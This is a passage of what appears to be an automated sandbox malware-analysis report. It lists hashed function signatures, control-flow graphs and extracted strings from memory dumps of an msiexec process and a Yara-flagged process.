                                                                        • Instruction Fuzzy Hash: 1890023164154403D10071585948B07040547D0201FA6D412A0465518DDA968A51A121
                                                                        Function 22133D10 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c296c9916dcff6bcc3218da0fdfb52cc4972f80cffcea91852263564726b7ee
                                                                        • Instruction ID: b72f7682f63763bee1b09e1662ac347a938b49eb66af6955ed43ca515bbf3638
                                                                        • Opcode Fuzzy Hash: 4c296c9916dcff6bcc3218da0fdfb52cc4972f80cffcea91852263564726b7ee
                                                                        • Instruction Fuzzy Hash: 6290023164254142954072585C44E4E450547E1302BE6D416A0056514CCD548A619221
                                                                        Function 22132D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 585edb8f9d51c56ba49c03889738f2584c2e1209b988f9e9bf64c2a755f8a76a
                                                                        • Instruction ID: ba036a84fad4a48e8f0b6c2720b9653b0afdec91940d9dcd6c22df98ddcc6e8f
                                                                        • Opcode Fuzzy Hash: 585edb8f9d51c56ba49c03889738f2584c2e1209b988f9e9bf64c2a755f8a76a
                                                                        • Instruction Fuzzy Hash: E390022965354002D18071585848A0A040547D1202FE6D416A0056518CCD558A699321
                                                                        Function 22132D00 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dec7e8771ef640afaeecf6633ae83136e28a08abddae2535df2f90365fffec56
                                                                        • Instruction ID: 75b527cf6b16f5481ac1a177fdb74edabf0bb593af390ab62f0274875e6d5570
                                                                        • Opcode Fuzzy Hash: dec7e8771ef640afaeecf6633ae83136e28a08abddae2535df2f90365fffec56
                                                                        • Instruction Fuzzy Hash: 9E90022164558442D10075585848E06040547D0205FA6D012A10A5555DCA758A51E131
                                                                        Function 22132D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba2cf147d4af6f218429e21ab7bf9a85becc691585f010587af829a3818aa020
                                                                        • Instruction ID: 5cd1cb76a054ce61041aed7d8d85122bc65a4c447ad4d8ba808f81ece350568c
                                                                        • Opcode Fuzzy Hash: ba2cf147d4af6f218429e21ab7bf9a85becc691585f010587af829a3818aa020
                                                                        • Instruction Fuzzy Hash: 4890022174154003D14071585858A06440597E1301FA6D012E0455514CDD558A569222
                                                                        Function 22133D70 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a0d7f1defa611be9b1b77e4677709f6788fcbcd4db3d444c8f3758edddbe39e
                                                                        • Instruction ID: 55e2578bbd2af31be10ffe70d6373e4bde5691b5bca8f753747d7698c0e7cf4a
                                                                        • Opcode Fuzzy Hash: 5a0d7f1defa611be9b1b77e4677709f6788fcbcd4db3d444c8f3758edddbe39e
                                                                        • Instruction Fuzzy Hash: 4290023564154402D51071585C44A46044647D0301FA6D412A0465518D8A948AA1E121
                                                                        Function 22132DB0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d25191ec75a2ef4c9ee124923588a195b43207e0efb2d4e7b5eeeb6cfb475d
                                                                        • Instruction ID: 3a67811387f63d3407e0151c43739be0e21325a9a50d6ba80bd3bb9e623df770
                                                                        • Opcode Fuzzy Hash: 67d25191ec75a2ef4c9ee124923588a195b43207e0efb2d4e7b5eeeb6cfb475d
                                                                        • Instruction Fuzzy Hash: 7090023168154402D14171584844A06040957D0241FE6C013A0465514E8A958B56EA61
                                                                        Function 22132DD0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e62fe31e4e2e90023a5f81b4c91de407e50304add363c081077b8024aeccdc9d
                                                                        • Instruction ID: d22ff094f0c551fa3001c9fe396afff05aa69e1844ae6c915e9fc7b945cc66ff
                                                                        • Opcode Fuzzy Hash: e62fe31e4e2e90023a5f81b4c91de407e50304add363c081077b8024aeccdc9d
                                                                        • Instruction Fuzzy Hash: 9F900221682581525545B1584844907440657E02417E6C013A1455910C89669A56D621
                                                                        Function 22132DF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 561744015d372eaf4f2479df096bbc968b62c81d6394cb1d910f6ff9feffde6f
                                                                        • Instruction ID: c0a91650baf10902f31e28b33bd06e900cd9e0121b6912142252065dc5794482
                                                                        • Opcode Fuzzy Hash: 561744015d372eaf4f2479df096bbc968b62c81d6394cb1d910f6ff9feffde6f
                                                                        • Instruction Fuzzy Hash: 2B90023164154413D11171584944B07040947D0241FE6C413A0465518D9A968B52E121
                                                                        Function 22132C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 78c68fd38cfd37d327962fb9b91592bf8688f21296c7a28d0a84071769884ce5
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 22132890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 675 22132890-221328b3 676 2216a4bc-2216a4c0 675->676 677 221328b9-221328cc 675->677 676->677 678 2216a4c6-2216a4ca 676->678 679 221328ce-221328d7 677->679 680 221328dd-221328df 677->680 678->677 681 2216a4d0-2216a4d4 678->681 679->680 682 2216a57e-2216a585 679->682 683 221328e1-221328e5 680->683 681->677 684 2216a4da-2216a4de 681->684 682->680 685 221328eb-221328fa 683->685 686 22132988-2213298e 683->686 684->677 687 2216a4e4-2216a4eb 684->687 688 22132900-22132905 685->688 689 2216a58a-2216a58d 685->689 690 22132908-2213290c 686->690 691 2216a564-2216a56c 687->691 692 2216a4ed-2216a4f4 687->692 688->690 689->690 690->683 693 2213290e-2213291b 690->693 691->677 694 2216a572-2216a576 691->694 695 2216a4f6-2216a4fe 692->695 696 2216a50b 692->696 697 22132921 693->697 698 2216a592-2216a599 693->698 694->677 699 2216a57c call 22140050 694->699 695->677 700 2216a504-2216a509 695->700 701 2216a510-2216a536 call 22140050 696->701 702 22132924-22132926 697->702 706 2216a5a1-2216a5c9 call 22140050 698->706 717 2216a55d-2216a55f 699->717 700->701 701->717 703 22132993-22132995 702->703 704 22132928-2213292a 702->704 703->704 712 22132997-221329b1 call 22140050 703->712 708 22132946-22132966 call 22140050 704->708 709 2213292c-2213292e 704->709 724 22132969-22132974 708->724 709->708 714 22132930-22132944 call 22140050 709->714 712->724 714->708 721 22132981-22132985 717->721 724->702 726 22132976-22132979 724->726 726->706 727 2213297f 726->727 727->721
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 9a9c7a6f845f78de0c56f0243806d742deb381c3c87c8013bb38910408b94719
                                                                        • Instruction ID: a3c484f3a5ccfb3e0bae7163fd102deab7f911bb57d4d8df5d46a020d984534a
                                                                        • Opcode Fuzzy Hash: 9a9c7a6f845f78de0c56f0243806d742deb381c3c87c8013bb38910408b94719
                                                                        • Instruction Fuzzy Hash: 1151D8B6A40356AFCB15EF98C990D7EFBF9BB483007108269E4A8D7641D674DF50C7A0
                                                                        Function 22127630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 932 22127630-22127651 933 22127653-2212766f call 220fe660 932->933 934 2212768b-22127699 call 22134c30 932->934 939 22127675-22127682 933->939 940 22164638 933->940 941 22127684 939->941 942 2212769a-221276a9 call 22127818 939->942 944 2216463f-22164645 940->944 941->934 948 22127701-2212770a 942->948 949 221276ab-221276c1 call 221277cd 942->949 946 221276c7-221276d0 call 22127728 944->946 947 2216464b-221646b8 call 2217f290 call 22139020 BaseQueryModuleData 944->947 946->948 960 221276d2 946->960 947->946 969 221646be-221646c6 947->969 952 221276d8-221276e1 948->952 949->944 949->946 957 221276e3-221276f2 call 2212771b 952->957 958 2212770c-2212770e 952->958 963 221276f4-221276f6 957->963 958->963 960->952 965 22127710-22127719 963->965 966 221276f8-221276fa 963->966 965->966 966->941 968 221276fc 966->968 970 221647be-221647d0 call 22132c50 968->970 969->946 972 221646cc-221646d3 969->972 970->941 972->946 974 221646d9-221646e4 972->974 975 221646ea-22164723 call 2217f290 call 2213aaa0 974->975 976 221647b9 call 22134d48 974->976 982 22164725-22164736 call 2217f290 975->982 983 2216473b-2216476b call 2217f290 975->983 976->970 982->948 983->946 988 22164771-2216477f call 2213a770 983->988 991 22164786-221647a3 call 2217f290 call 2216cf9e 988->991 992 22164781-22164783 988->992 991->946 997 221647a9-221647b2 991->997 992->991 997->988 998 221647b4 997->998 998->946
                                                                        Strings
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 22164787
                                                                        • Execute=1, xrefs: 22164713
                                                                        • ExecuteOptions, xrefs: 221646A0
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 221646FC
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22164655
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22164725
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22164742
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 18bf63934bcf37b5abdd6b56ad6d8dd39419a73939aafd96cff4ec22161af6c2
                                                                        • Instruction ID: c125f1be429424c29f5aecac9b3ed73cd65fa6b07f6e6694e8894fa551835444
                                                                        • Opcode Fuzzy Hash: 18bf63934bcf37b5abdd6b56ad6d8dd39419a73939aafd96cff4ec22161af6c2
                                                                        • Instruction Fuzzy Hash: 63511B31A807296EEB11DAA4DD99FEF77B9EF18304F000299E604A7191DB719F46CF90
                                                                        Function 2213B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 79232e2a58bd389f600a673e1c15b1c8398726074469b3ae0e94821170d7f8ad
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: AD81C3B0E853498EDB06AF64C951FEEBBB3EF45354F14425AD860A72D2E7348B40CB90
                                                                        Function 2211F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 221602E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 221602BD
                                                                        • RTL: Re-Waiting, xrefs: 2216031E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: fac59d10fb6725d0fb79361b289a7e23e437a739d7a1959c4bdfda7ddb612681
                                                                        • Instruction ID: 48ecc2b8e81905fade8cffd79965e41a0c3d7ae229fad1fb9fdc5d6b8bcfd2ad
                                                                        • Opcode Fuzzy Hash: fac59d10fb6725d0fb79361b289a7e23e437a739d7a1959c4bdfda7ddb612681
                                                                        • Instruction Fuzzy Hash: 97E1BC706887419FD711CF28C980F6AB7E0BF84368F140A6DF5A58B2E1DB74DA55CB82
                                                                        Function 2212BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 22167B8E
                                                                        • RTL: Re-Waiting, xrefs: 22167BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22167B7F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: 0f4e76f4da7a798c013dfdeecb18399d0bfe8b8eb2c88b3e499d9f5069a97b8e
                                                                        • Instruction ID: 08abda8d440156219d671d396827109c15f36b2341f18b356a43379b3aa1e1e4
                                                                        • Opcode Fuzzy Hash: 0f4e76f4da7a798c013dfdeecb18399d0bfe8b8eb2c88b3e499d9f5069a97b8e
                                                                        • Instruction Fuzzy Hash: 7F41B031785B529FD710CE25C940FAAB7E5EF98710F100B1DF9699B680DB31EB058B91
                                                                        Function 2212B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2216728C
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 221672A3
                                                                        • RTL: Re-Waiting, xrefs: 221672C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22167294
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: 4f54455b91c40fc643bac96e93ec3f34348b87fe3e37fd39811512633bd95ec6
                                                                        • Instruction ID: eff7dbd1a5974cf662f7ab80204616b6c1370a2504757ae1f57ea3fc80f0bc95
                                                                        • Opcode Fuzzy Hash: 4f54455b91c40fc643bac96e93ec3f34348b87fe3e37fd39811512633bd95ec6
                                                                        • Instruction Fuzzy Hash: CE41F032680752AFD710CE25CD80FAAB7A5FFA4714F100619F965AB240DB21EB56CBD1
                                                                        Function 22137D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction ID: 13d9077746b3c243c003c1c989a7db80e37d0a5fe47ae12cd4de0ca1862c6b0d
                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction Fuzzy Hash: 6A918270A803159EDB12DF69C980EEEB7E7BF44724F61461AE965EB2C1D7308B428750
                                                                        Function 220F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: fda710faed7c34c6e75952a0ae2e15811665a00aad676f6de6f3cc0c37502ffe
                                                                        • Instruction ID: 421538e03ebfe40d2628175286a0c1524e937bee496a97c6328adf10c8ba88d8
                                                                        • Opcode Fuzzy Hash: fda710faed7c34c6e75952a0ae2e15811665a00aad676f6de6f3cc0c37502ffe
                                                                        • Instruction Fuzzy Hash: E9810772D403699BDB75CB54CD44FDAB7B8AB08754F0041EAAA19B7280E7709F84CFA0

                                                                        Executed Functions

                                                                        Function 0362993D Relevance: 35.5, Strings: 28, Instructions: 526COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "+$"3$0$3M$90$;$<$?ypG$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$s:$uS$|~$/$]$m
                                                                        • API String ID: 0-3736242705
                                                                        • Opcode ID: 30d5eaba034ffdc9cccf611b9cbbb9085954868c377906926dff1160daaf6621
                                                                        • Instruction ID: 7b639ae99f87f14ff0d90ff36e3ff40b4a41c28f0a76ac1dbee72cc0ef7f7728
                                                                        • Opcode Fuzzy Hash: 30d5eaba034ffdc9cccf611b9cbbb9085954868c377906926dff1160daaf6621
                                                                        • Instruction Fuzzy Hash: 8E52BEB0D05669CBEB24CF44C998BDDBBB2BB84308F1485D9D50A6B280CBB55EC9CF45
                                                                        Function 036377DC Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
